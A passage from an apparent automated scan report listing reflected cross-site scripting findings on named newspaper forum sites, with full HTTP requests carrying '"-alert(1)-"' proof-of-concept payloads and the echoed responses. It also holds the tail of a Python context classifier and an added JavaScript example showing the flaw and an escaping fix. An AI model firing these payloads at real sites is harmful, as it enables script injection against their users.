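    "attr": '<a href="leanspa.php?t=1239000/' + CANARY + '" target="_blank">',
    "tracker": 'if(typeof (guBadge)=="undefined"){var guBadge="' + CANARY + '"}',
    "jsonp": "_ate.ad.hpr" + CANARY + '({"urls":[],"segments":[]})',
    "meta": '<head>\n<meta property="og:url" content="http://www.zvents.com/?' + CANARY + '=1" />',
    "inline": "<script language=\"JavaScript\">\nif (typeof s != 'undefined') {\n"
              '   s.prop4=s.prop3 + " / ?' + CANARY + '=1";\n}\n</script>',
}

if __name__ == "__main__":
    types = {"xml": "text/xml;charset=UTF-8", "attr": "text/html",
             "tracker": "application/javascript", "jsonp": "text/javascript",
             "meta": "text/html; charset=utf-8", "inline": "text/html; charset=utf-8"}
    for name, body in SAMPLES.items():
        ctx = classify(types[name], body, CANARY)
        print("%-8s %-22s probe: %s" % (name, ctx, suggest_probe(ctx)))
```

Run against the six samples, the classifier returns xml-text, html-attribute("), js-string("), js-code, html-attribute(") and script-string(") respectively, which is the distinction the findings above turn on: the two attribute cases and the inline-script case take the "> and "-alert(1)-" breakouts and execute in the page, the XML case needs the XHTML-namespace element, and the two script-response cases need a quote breakout plus a way to get the script loaded with attacker-controlled input before they count as XSS.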

3.50. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ee8e"-alert(1)-"47271c9d198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11?8ee8e"-alert(1)-"47271c9d198=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11?8ee8e"-alert(1)-"47271c9d198=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...
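Every finding in this group has the same shape: the request path (and query string) is spliced verbatim into the double-quoted string assigned to s.prop4 inside the site's Omniture tracking script. The following is an added example, not code from the scan report or from the site, that reproduces that pattern, shows why the "-alert(1)-" payload runs without breaking the rest of the script, and contrasts it with emitting the value as a properly escaped JavaScript string literal. Function names and the sample URI are illustrative; the sandbox uses a stubbed alert() so it can run under Node.

```javascript
// Added example (not part of the scan report or of the site's own code): why the
// "-alert(1)-" payload executes inside the tracking block, and one way to emit the
// same value safely. Function names here are illustrative.

// Mirrors the vulnerable pattern shown in the responses: the raw request URI is
// concatenated into a double-quoted JavaScript string literal in an inline script.
function buildTrackingBlock(requestUri) {
  return 's.prop3="Home / Opinion / Forums";\n' +
         's.prop4=s.prop3 + " / ' + requestUri + '";';
}

// Serialise a value as a JavaScript string literal that cannot break out of the
// literal or out of the enclosing <script> element. JSON.stringify already escapes
// quotes, backslashes and control characters (including NUL); the extra replacements
// cover "</script>" and the two Unicode line terminators JSON leaves unescaped.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened form of the same assignment: the user-controlled part is a separate,
// fully escaped literal rather than text spliced into the page's own literal.
function buildTrackingBlockSafe(requestUri) {
  return 's.prop3="Home / Opinion / Forums";\n' +
         's.prop4=s.prop3 + " / " + ' + jsStringLiteral(requestUri) + ';';
}

// Run a tracking block in a sandbox with a stubbed alert(), and report whether
// alert() fired, what s.prop4 ended up holding, and whether the script was even
// syntactically valid. The "-" operators in the payload matter: binary minus coerces
// the surrounding strings to numbers instead of producing a syntax error, so the
// page keeps running and s.prop4 silently becomes NaN.
function runBlock(script) {
  const s = {};
  let alertCalls = 0;
  const alert = () => { alertCalls += 1; return 0; };
  try {
    new Function('s', 'alert', script)(s, alert);
    return { alertCalls, prop4: s.prop4, syntaxError: false };
  } catch (e) {
    if (e instanceof SyntaxError) return { alertCalls, prop4: undefined, syntaxError: true };
    throw e;
  }
}

// Constructed inputs in the same shape as the report's payloads (marker-payload-marker).
const PAYLOAD_URI = '/forum/news54941"-alert(1)-"d801b306391';
const BENIGN_URI = '/forum/news';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', runBlock(buildTrackingBlock(PAYLOAD_URI)));
  console.log('hardened:  ', runBlock(buildTrackingBlockSafe(PAYLOAD_URI)));
  console.log('benign:    ', runBlock(buildTrackingBlockSafe(BENIGN_URI)));
}
```

The check worth keeping from this is the sandbox: if a reflected value reaches a script string context, feed the emitted script to runBlock() and confirm alert() is never called and s.prop4 equals the literal input. Note that the hardened form still puts attacker-controlled text into analytics data; the remediation text above is right that not echoing the request URI into script at all is the stronger fix.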

3.51. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58"-alert(1)-"da78a3fd75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?91e58"-alert(1)-"da78a3fd75c=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:11:57 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=6ec373c57579c10d331d00c8ebed1d1d; expires=Wed, 08 Dec 2010 02:45:17 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
pt language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / ?91e58"-alert(1)-"da78a3fd75c=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.52. http://forums.mercurynews.com/forum/576 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/576

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45812"-alert(1)-"613868a3771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum45812"-alert(1)-"613868a3771/576 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum45812"-alert(1)-"613868a3771/576";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=get
...[SNIP]...

3.53. http://forums.mercurynews.com/forum/576 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/576

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79cf3"-alert(1)-"89396556484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/57679cf3"-alert(1)-"89396556484 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
age="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/57679cf3"-alert(1)-"89396556484";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.54. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/576

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb6"-alert(1)-"9c54b14f479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/576?4beb6"-alert(1)-"9c54b14f479=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
!= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/business-technology-business-news?4beb6"-alert(1)-"9c54b14f479=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.55. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/business-technology-business-news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6416f"-alert(1)-"3bf608c035c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:23 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVa
...[SNIP]...

3.56. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/business-technology-business-news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67461"-alert(1)-"eb6ddd1910a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
!= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.57. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/business-technology-business-news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931e2"-alert(1)-"60a68e53a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
!= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.58. http://forums.mercurynews.com/forum/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ec4"-alert(1)-"16924a4f316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumf7ec4"-alert(1)-"16924a4f316/news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumf7ec4"-alert(1)-"16924a4f316/news";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=ge
...[SNIP]...

3.59. http://forums.mercurynews.com/forum/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54941"-alert(1)-"d801b306391 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/news54941"-alert(1)-"d801b306391 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:44 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ge="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/news54941"-alert(1)-"d801b306391";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.60. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9da1"-alert(1)-"992e5590b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/news?c9da1"-alert(1)-"992e5590b97=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:24 GMT
